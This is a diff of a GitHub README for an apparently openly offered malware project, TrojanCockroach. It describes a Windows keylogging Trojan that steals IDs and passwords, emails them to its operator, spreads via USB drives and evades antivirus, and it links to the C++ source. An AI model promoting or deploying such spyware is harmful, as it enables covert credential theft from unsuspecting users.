MinhasKamal/TrojanCockroach/README.md

 #### A Stealthy Trojan Spyware

-<a href="https://MinhasKamal.github.io/TrojanCockroach">This program</a> is a **Trojan Virus** that steals data (ID, password; every key stroke) from PC (Windows XP or later) and emails it back to the host.
-It spreads among PCs through USB drives.
-It is almost undetectable to any antivirus software.
+You are looking at a **Trojan Virus** that steals data (ID, password; every key stroke) from PC (Windows XP or later), then emails them back to you.
+It spreads among PCs through USB drives, and is almost undetectable to any antivirus software.

-*This project is created only for learning purpose.*
+*Created only for learning purpose.*

 ### Intro
 - [TrojanCockroach.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/TrojanCockroach.cpp)- logs user's data, sends data through Transmit.exe, infects portable drive.